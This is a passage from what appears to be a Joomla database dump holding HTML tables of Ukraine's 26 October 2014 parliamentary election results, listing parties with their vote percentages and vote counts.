style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">0.19</span></p>\r\n</td>\r\n<td style=\"width: 48.15pt; padding: 0.75pt;\" width=\"64\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">183</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 205.95pt; padding: 0.75pt;\" width=\"275\">\r\n<p style=\"margin-bottom: 0.0001pt; line-height: normal;\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\"><a href=\"http://www.cvk.gov.ua/pls/vnd2014/wp502pt001f01=910pf7171=179.html\"><span style=\"color: blue;\">Політична партія \"Інтернет партія України\"</span></a></span></p>\r\n</td>\r\n<td style=\"width: 50.7pt; padding: 0.75pt;\" width=\"68\">&nbsp;</td>\r\n<td style=\"width: 48.15pt; padding: 0.75pt;\" width=\"64\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">0.18</span></p>\r\n</td>\r\n<td style=\"width: 48.15pt; padding: 0.75pt;\" width=\"64\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">174</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 205.95pt; padding: 0.75pt;\" width=\"275\">\r\n<p style=\"margin-bottom: 0.0001pt; line-height: normal;\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\"><a href=\"http://www.cvk.gov.ua/pls/vnd2014/wp502pt001f01=910pf7171=175.html\"><span style=\"color: blue;\">Партія \"ВІДРОДЖЕННЯ\"</span></a></span></p>\r\n</td>\r\n<td style=\"width: 50.7pt; padding: 0.75pt;\" width=\"68\">&nbsp;</td>\r\n<td style=\"width: 48.15pt; padding: 0.75pt;\" width=\"64\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">0.18</span></p>\r\n</td>\r\n<td style=\"width: 48.15pt; padding: 0.75pt;\" width=\"64\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">174</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 205.95pt; padding: 0.75pt;\" width=\"275\">\r\n<p style=\"margin-bottom: 0.0001pt; line-height: normal;\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\"><a href=\"http://www.cvk.gov.ua/pls/vnd2014/wp502pt001f01=910pf7171=211.html\"><span style=\"color: blue;\">політична партія ВСЕУКРАЇНСЬКЕ ПОЛІТИЧНЕ ОБ\'ЄДНАННЯ \"УКРАЇНА – ЄДИНА КРАЇНА\"</span></a></span></p>\r\n</td>\r\n<td style=\"width: 50.7pt; padding: 0.75pt;\" width=\"68\">&nbsp;</td>\r\n<td style=\"width: 48.15pt; padding: 0.75pt;\" width=\"64\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">0.15</span></p>\r\n</td>\r\n<td style=\"width: 48.15pt; padding: 0.75pt;\" width=\"64\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">152</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 205.95pt; padding: 0.75pt;\" width=\"275\">\r\n<p style=\"margin-bottom: 0.0001pt; line-height: normal;\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\"><a href=\"http://www.cvk.gov.ua/pls/vnd2014/wp502pt001f01=910pf7171=204.html\"><span style=\"color: blue;\">Політична партія \"Сила Людей\"</span></a></span></p>\r\n</td>\r\n<td style=\"width: 50.7pt; padding: 0.75pt;\" width=\"68\">&nbsp;</td>\r\n<td style=\"width: 48.15pt; padding: 0.75pt;\" width=\"64\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">0.14</span></p>\r\n</td>\r\n<td style=\"width: 48.15pt; padding: 0.75pt;\" width=\"64\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">135</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 205.95pt; padding: 0.75pt;\" width=\"275\">\r\n<p style=\"margin-bottom: 0.0001pt; line-height: normal;\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\"><a href=\"http://www.cvk.gov.ua/pls/vnd2014/wp502pt001f01=910pf7171=135.html\"><span style=\"color: blue;\">Політична партія \"НОВА ПОЛІТИКА\"</span></a></span></p>\r\n</td>\r\n<td style=\"width: 50.7pt; padding: 0.75pt;\" width=\"68\">&nbsp;</td>\r\n<td style=\"width: 48.15pt; padding: 0.75pt;\" width=\"64\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">0.12</span></p>\r\n</td>\r\n<td style=\"width: 48.15pt; padding: 0.75pt;\" width=\"64\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">119</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 205.95pt; padding: 0.75pt;\" width=\"275\">\r\n<p style=\"margin-bottom: 0.0001pt; line-height: normal;\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\"><a href=\"http://www.cvk.gov.ua/pls/vnd2014/wp502pt001f01=910pf7171=152.html\"><span style=\"color: blue;\">ПОЛІТИЧНА ПАРТІЯ \"УКРАЇНА МАЙБУТНЬОГО\"</span></a></span></p>\r\n</td>\r\n<td style=\"width: 50.7pt; padding: 0.75pt;\" width=\"68\">&nbsp;</td>\r\n<td style=\"width: 48.15pt; padding: 0.75pt;\" width=\"64\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">0.10</span></p>\r\n</td>\r\n<td style=\"width: 48.15pt; padding: 0.75pt;\" width=\"64\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">100</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 205.95pt; padding: 0.75pt;\" width=\"275\">\r\n<p style=\"margin-bottom: 0.0001pt; line-height: normal;\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\"><a href=\"http://www.cvk.gov.ua/pls/vnd2014/wp502pt001f01=910pf7171=205.html\"><span style=\"color: blue;\">Політична партія \"Національна Демократична партія України\"</span></a></span></p>\r\n</td>\r\n<td style=\"width: 50.7pt; padding: 0.75pt;\" width=\"68\">&nbsp;</td>\r\n<td style=\"width: 48.15pt; padding: 0.75pt;\" width=\"64\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">0.09</span></p>\r\n</td>\r\n<td style=\"width: 48.15pt; padding: 0.75pt;\" width=\"64\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">94</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 205.95pt; padding: 0.75pt;\" width=\"275\">\r\n<p style=\"margin-bottom: 0.0001pt; line-height: normal;\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\"><a href=\"http://www.cvk.gov.ua/pls/vnd2014/wp502pt001f01=910pf7171=177.html\"><span style=\"color: blue;\">Політична партія Громадянський рух України</span></a></span></p>\r\n</td>\r\n<td style=\"width: 50.7pt; padding: 0.75pt;\" width=\"68\">&nbsp;</td>\r\n<td style=\"width: 48.15pt; padding: 0.75pt;\" width=\"64\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">0.08</span></p>\r\n</td>\r\n<td style=\"width: 48.15pt; padding: 0.75pt;\" width=\"64\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">85</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 205.95pt; padding: 0.75pt;\" width=\"275\">\r\n<p style=\"margin-bottom: 0.0001pt; line-height: normal;\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\"><a href=\"http://www.cvk.gov.ua/pls/vnd2014/wp502pt001f01=910pf7171=192.html\"><span style=\"color: blue;\">Політична партія \"Сила і Честь\"</span></a></span></p>\r\n</td>\r\n<td style=\"width: 50.7pt; padding: 0.75pt;\" width=\"68\">&nbsp;</td>\r\n<td style=\"width: 48.15pt; padding: 0.75pt;\" width=\"64\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">0.08</span></p>\r\n</td>\r\n<td style=\"width: 48.15pt; padding: 0.75pt;\" width=\"64\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">84</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 205.95pt; padding: 0.75pt;\" width=\"275\">\r\n<p style=\"margin-bottom: 0.0001pt; line-height: normal;\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\"><a href=\"http://www.cvk.gov.ua/pls/vnd2014/wp502pt001f01=910pf7171=198.html\"><span style=\"color: blue;\">ПОЛІТИЧНА ПАРТІЯ \"БЛОК ЛІВИХ СИЛ УКРАЇНИ\"</span></a></span></p>\r\n</td>\r\n<td style=\"width: 50.7pt; padding: 0.75pt;\" width=\"68\">&nbsp;</td>\r\n<td style=\"width: 48.15pt; padding: 0.75pt;\" width=\"64\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">0.08</span></p>\r\n</td>\r\n<td style=\"width: 48.15pt; padding: 0.75pt;\" width=\"64\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">84</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 205.95pt; padding: 0.75pt;\" width=\"275\">\r\n<p style=\"margin-bottom: 0.0001pt; line-height: normal;\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\"><a href=\"http://www.cvk.gov.ua/pls/vnd2014/wp502pt001f01=910pf7171=207.html\"><span style=\"color: blue;\">політична партія Конгрес Українських Націоналістів</span></a></span></p>\r\n</td>\r\n<td style=\"width: 50.7pt; padding: 0.75pt;\" width=\"68\">&nbsp;</td>\r\n<td style=\"width: 48.15pt; padding: 0.75pt;\" width=\"64\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">0.06</span></p>\r\n</td>\r\n<td style=\"width: 48.15pt; padding: 0.75pt;\" width=\"64\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">62</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 205.95pt; padding: 0.75pt;\" width=\"275\">\r\n<p style=\"margin-bottom: 0.0001pt; line-height: normal;\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\"><a href=\"http://www.cvk.gov.ua/pls/vnd2014/wp502pt001f01=910pf7171=147.html\"><span style=\"color: blue;\">Ліберальна партія України</span></a></span></p>\r\n</td>\r\n<td style=\"width: 50.7pt; padding: 0.75pt;\" width=\"68\">&nbsp;</td>\r\n<td style=\"width: 48.15pt; padding: 0.75pt;\" width=\"64\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">0.05</span></p>\r\n</td>\r\n<td style=\"width: 48.15pt; padding: 0.75pt;\" width=\"64\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">51</span></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','',1,8,'2014-10-31 06:12:57',430,'','2014-10-31 06:24:23',430,0,'0000-00-00 00:00:00','2014-10-31 06:12:57','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,52,'','',1,913,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(903,1157,'Позачергові вибори народних депутатів України 26 жовтня 2014 року','pozachergovi-vibori-narodnikh-deputativ-ukrajini-26-zhovtnya-2014-roku','<table style=\"width: 562px; height: 38px;\" border=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"width: 452.85pt; padding: 0.75pt;\" width=\"604\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: right; line-height: normal;\" align=\"right\"><strong><span style=\"font-size: 9pt; font-family: \'Times New Roman\',\'serif\';\">Позачергові вибори народних депутатів України 26 жовтня 2014 року</span></strong><span style=\"font-size: 9pt; font-family: \'Times New Roman\',\'serif\';\"><br /> Cтаном на : 02.11.2014 08:59:49</span></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table border=\"0\" cellspacing=\"1\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"width: 80%; padding: 0.75pt;\" width=\"80%\">\r\n<p style=\"margin-bottom: 0.0001pt; line-height: normal;\"><span style=\"font-size: 9pt; font-family: \'Times New Roman\',\'serif\';\">% опрацьованих протоколів по Україні</span></p>\r\n</td>\r\n<td style=\"width: 20%; padding: 0.75pt;\" width=\"20%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><strong><span style=\"font-size: 9pt; font-family: \'Times New Roman\',\'serif\';\">99.92</span></strong></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table style=\"width: 91%;\" border=\"0\" cellspacing=\"1\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"width: 6.5%; padding: 0.75pt;\" width=\"6%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 9pt; font-family: \'Times New Roman\',\'serif\';\">№</span></p>\r\n</td>\r\n<td style=\"width: 46.68%; padding: 0.75pt;\" width=\"46%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 9pt; font-family: \'Times New Roman\',\'serif\';\">Партія</span></p>\r\n</td>\r\n<td style=\"width: 9.36%; padding: 0.75pt;\" width=\"9%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 9pt; font-family: \'Times New Roman\',\'serif\';\">Графік </span></p>\r\n</td>\r\n<td style=\"width: 17.5%; padding: 0.75pt;\" width=\"17%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 9pt; font-family: \'Times New Roman\',\'serif\';\">Відсоток \"ЗА\"</span></p>\r\n</td>\r\n<td style=\"width: 19%; padding: 0.75pt;\" width=\"19%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 9pt; font-family: \'Times New Roman\',\'serif\';\">Голосів \"ЗА\"</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 6.5%; padding: 0.75pt;\" width=\"6%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><strong><span style=\"font-size: 9pt; font-family: \'Times New Roman\',\'serif\'; color: #0000ff; background-color: #ffffff;\">1</span></strong></p>\r\n</td>\r\n<td style=\"width: 46.68%; padding: 0.75pt;\" width=\"46%\">\r\n<p style=\"margin-bottom: 0.0001pt; line-height: normal;\"><strong><span style=\"font-size: 9pt; font-family: \'Times New Roman\',\'serif\'; background-color: #ffffff; color: #0000ff;\"><a href=\"http://www.cvk.gov.ua/pls/vnd2014/wp302pt001f01=910pf7171=182.html\"><span style=\"color: #0000ff; background-color: #ffffff;\">Політична партія \"НАРОДНИЙ ФРОНТ\"</span></a></span></strong></p>\r\n</td>\r\n<td style=\"width: 9.36%; padding: 0.75pt;\" width=\"9%\"><strong><span style=\"background-color: #ffffff; color: #0000ff;\">&nbsp;</span></strong></td>\r\n<td style=\"width: 17.5%; padding: 0.75pt;\" width=\"17%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><strong><span style=\"font-size: 9pt; font-family: \'Times New Roman\',\'serif\'; background-color: #ffffff; color: #0000ff;\">22.14</span></strong></p>\r\n</td>\r\n<td style=\"width: 19%; padding: 0.75pt;\" width=\"19%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><strong><span style=\"font-size: 9pt; font-family: \'Times New Roman\',\'serif\'; background-color: #ffffff; color: #0000ff;\">3 487 263</span></strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 6.5%; padding: 0.75pt;\" width=\"6%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><strong><span style=\"font-size: 9pt; font-family: \'Times New Roman\',\'serif\'; color: #0000ff; background-color: #ffffff;\">2</span></strong></p>\r\n</td>\r\n<td style=\"width: 46.68%; padding: 0.75pt;\" width=\"46%\">\r\n<p style=\"margin-bottom: 0.0001pt; line-height: normal;\"><strong><span style=\"font-size: 9pt; font-family: \'Times New Roman\',\'serif\'; background-color: #ffffff; color: #0000ff;\"><a href=\"http://www.cvk.gov.ua/pls/vnd2014/wp302pt001f01=910pf7171=202.html\"><span style=\"color: #0000ff; background-color: #ffffff;\">ПАРТІЯ \"БЛОК ПЕТРА ПОРОШЕНКА\"</span></a></span></strong></p>\r\n</td>\r\n<td style=\"width: 9.36%; padding: 0.75pt;\" width=\"9%\"><strong><span style=\"background-color: #ffffff; color: #0000ff;\">&nbsp;</span></strong></td>\r\n<td style=\"width: 17.5%; padding: 0.75pt;\" width=\"17%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><strong><span style=\"font-size: 9pt; font-family: \'Times New Roman\',\'serif\'; background-color: #ffffff; color: #0000ff;\">21.82</span></strong></p>\r\n</td>\r\n<td style=\"width: 19%; padding: 0.75pt;\" width=\"19%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><strong><span style=\"font-size: 9pt; font-family: \'Times New Roman\',\'serif\'; background-color: #ffffff; color: #0000ff;\">3 436 789</span></strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 6.5%; padding: 0.75pt;\" width=\"6%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><strong><span style=\"font-size: 9pt; font-family: \'Times New Roman\',\'serif\'; color: #0000ff; background-color: #ffffff;\">3</span></strong></p>\r\n</td>\r\n<td style=\"width: 46.68%; padding: 0.75pt;\" width=\"46%\">\r\n<p style=\"margin-bottom: 0.0001pt; line-height: normal;\"><strong><span style=\"font-size: 9pt; font-family: \'Times New Roman\',\'serif\'; background-color: #ffffff; color: #0000ff;\"><a href=\"http://www.cvk.gov.ua/pls/vnd2014/wp302pt001f01=910pf7171=185.html\"><span style=\"color: #0000ff; background-color: #ffffff;\">Політична партія \"Об’єднання \"САМОПОМІЧ\"</span></a></span></strong></p>\r\n</td>\r\n<td style=\"width: 9.36%; padding: 0.75pt;\" width=\"9%\"><strong><span style=\"background-color: #ffffff; color: #0000ff;\">&nbsp;</span></strong></td>\r\n<td style=\"width: 17.5%; padding: 0.75pt;\" width=\"17%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><strong><span style=\"font-size: 9pt; font-family: \'Times New Roman\',\'serif\'; background-color: #ffffff; color: #0000ff;\">10.97</span></strong></p>\r\n</td>\r\n<td style=\"width: 19%; padding: 0.75pt;\" width=\"19%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><strong><span style=\"font-size: 9pt; font-family: \'Times New Roman\',\'serif\'; background-color: #ffffff; color: #0000ff;\">1 728 616</span></strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 6.5%; padding: 0.75pt;\" width=\"6%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><strong><span style=\"font-size: 9pt; font-family: \'Times New Roman\',\'serif\'; color: #0000ff; background-color: #ffffff;\">4</span></strong></p>\r\n</td>\r\n<td style=\"width: 46.68%; padding: 0.75pt;\" width=\"46%\">\r\n<p style=\"margin-bottom: 0.0001pt; line-height: normal;\"><strong><span style=\"font-size: 9pt; font-family: \'Times New Roman\',\'serif\'; background-color: #ffffff; color: #0000ff;\"><a href=\"http://www.cvk.gov.ua/pls/vnd2014/wp302pt001f01=910pf7171=199.html\"><span style=\"color: #0000ff; background-color: #ffffff;\">Політична партія \"Опозиційний блок\"</span></a></span></strong></p>\r\n</td>\r\n<td style=\"width: 9.36%; padding: 0.75pt;\" width=\"9%\"><strong><span style=\"background-color: #ffffff; color: #0000ff;\">&nbsp;</span></strong></td>\r\n<td style=\"width: 17.5%; padding: 0.75pt;\" width=\"17%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><strong><span style=\"font-size: 9pt; font-family: \'Times New Roman\',\'serif\'; background-color: #ffffff; color: #0000ff;\">9.42</span></strong></p>\r\n</td>\r\n<td style=\"width: 19%; padding: 0.75pt;\" width=\"19%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><strong><span style=\"font-size: 9pt; font-family: \'Times New Roman\',\'serif\'; background-color: #ffffff; color: #0000ff;\">1 483 323</span></strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 6.5%; padding: 0.75pt;\" width=\"6%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><strong><span style=\"font-size: 9pt; font-family: \'Times New Roman\',\'serif\'; color: #0000ff; background-color: #ffffff;\">5</span></strong></p>\r\n</td>\r\n<td style=\"width: 46.68%; padding: 0.75pt;\" width=\"46%\">\r\n<p style=\"margin-bottom: 0.0001pt; line-height: normal;\"><strong><span style=\"font-size: 9pt; font-family: \'Times New Roman\',\'serif\'; background-color: #ffffff; color: #0000ff;\"><a href=\"http://www.cvk.gov.ua/pls/vnd2014/wp302pt001f01=910pf7171=144.html\"><span style=\"color: #0000ff; background-color: #ffffff;\">Радикальна Партія Олега Ляшка</span></a></span></strong></p>\r\n</td>\r\n<td style=\"width: 9.36%; padding: 0.75pt;\" width=\"9%\"><strong><span style=\"background-color: #ffffff; color: #0000ff;\">&nbsp;</span></strong></td>\r\n<td style=\"width: 17.5%; padding: 0.75pt;\" width=\"17%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><strong><span style=\"font-size: 9pt; font-family: \'Times New Roman\',\'serif\'; background-color: #ffffff; color: #0000ff;\">7.44</span></strong></p>\r\n</td>\r\n<td style=\"width: 19%; padding: 0.75pt;\" width=\"19%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><strong><span style=\"font-size: 9pt; font-family: \'Times New Roman\',\'serif\'; background-color: #ffffff; color: #0000ff;\">1 172 682</span></strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 6.5%; padding: 0.75pt;\" width=\"6%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><strong><span style=\"font-size: 9pt; font-family: \'Times New Roman\',\'serif\'; color: #0000ff; background-color: #ffffff;\">6</span></strong></p>\r\n</td>\r\n<td style=\"width: 46.68%; padding: 0.75pt;\" width=\"46%\">\r\n<p style=\"margin-bottom: 0.0001pt; line-height: normal;\"><strong><span style=\"font-size: 9pt; font-family: \'Times New Roman\',\'serif\'; background-color: #ffffff; color: #0000ff;\"><a href=\"http://www.cvk.gov.ua/pls/vnd2014/wp302pt001f01=910pf7171=149.html\"><span style=\"color: #0000ff; background-color: #ffffff;\">політична партія Всеукраїнське об’єднання \"Батьківщина\"</span></a></span></strong></p>\r\n</td>\r\n<td style=\"width: 9.36%; padding: 0.75pt;\" width=\"9%\"><strong><span style=\"background-color: #ffffff; color: #0000ff;\">&nbsp;</span></strong></td>\r\n<td style=\"width: 17.5%; padding: 0.75pt;\" width=\"17%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><strong><span style=\"font-size: 9pt; font-family: \'Times New Roman\',\'serif\'; background-color: #ffffff; color: #0000ff;\">5.68</span></strong></p>\r\n</td>\r\n<td style=\"width: 19%; padding: 0.75pt;\" width=\"19%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><strong><span style=\"font-size: 9pt; font-family: \'Times New Roman\',\'serif\'; background-color: #ffffff; color: #0000ff;\">894 310</span></strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 6.5%; padding: 0.75pt;\" width=\"6%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 9pt; font-family: \'Times New Roman\',\'serif\';\">7 </span></p>\r\n</td>\r\n<td style=\"width: 46.68%; padding: 0.75pt;\" width=\"46%\">\r\n<p style=\"margin-bottom: 0.0001pt; line-height: normal;\"><span style=\"font-size: 9pt; font-family: \'Times New Roman\',\'serif\';\"><a href=\"http://www.cvk.gov.ua/pls/vnd2014/wp302pt001f01=910pf7171=155.html\"><span style=\"color: blue;\">політична партія Всеукраїнське об’єднання \"Свобода\"</span></a></span></p>\r\n</td>\r\n<td style=\"width: 9.36%; padding: 0.75pt;\" width=\"9%\">&nbsp;</td>\r\n<td style=\"width: 17.5%; padding: 0.75pt;\" width=\"17%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 9pt; font-family: \'Times New Roman\',\'serif\';\">4.71</span></p>\r\n</td>\r\n<td style=\"width: 19%; padding: 0.75pt;\" width=\"19%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 9pt; font-family: \'Times New Roman\',\'serif\';\">741 855</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 6.5%; padding: 0.75pt;\" width=\"6%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 9pt; font-family: \'Times New Roman\',\'serif\';\">8 </span></p>\r\n</td>\r\n<td style=\"width: 46.68%; padding: 0.75pt;\" width=\"46%\">\r\n<p style=\"margin-bottom: 0.0001pt; line-height: normal;\"><span style=\"font-size: 9pt; font-family: \'Times New Roman\',\'serif\';\"><a href=\"http://www.cvk.gov.ua/pls/vnd2014/wp302pt001f01=910pf7171=142.html\"><span style=\"color: 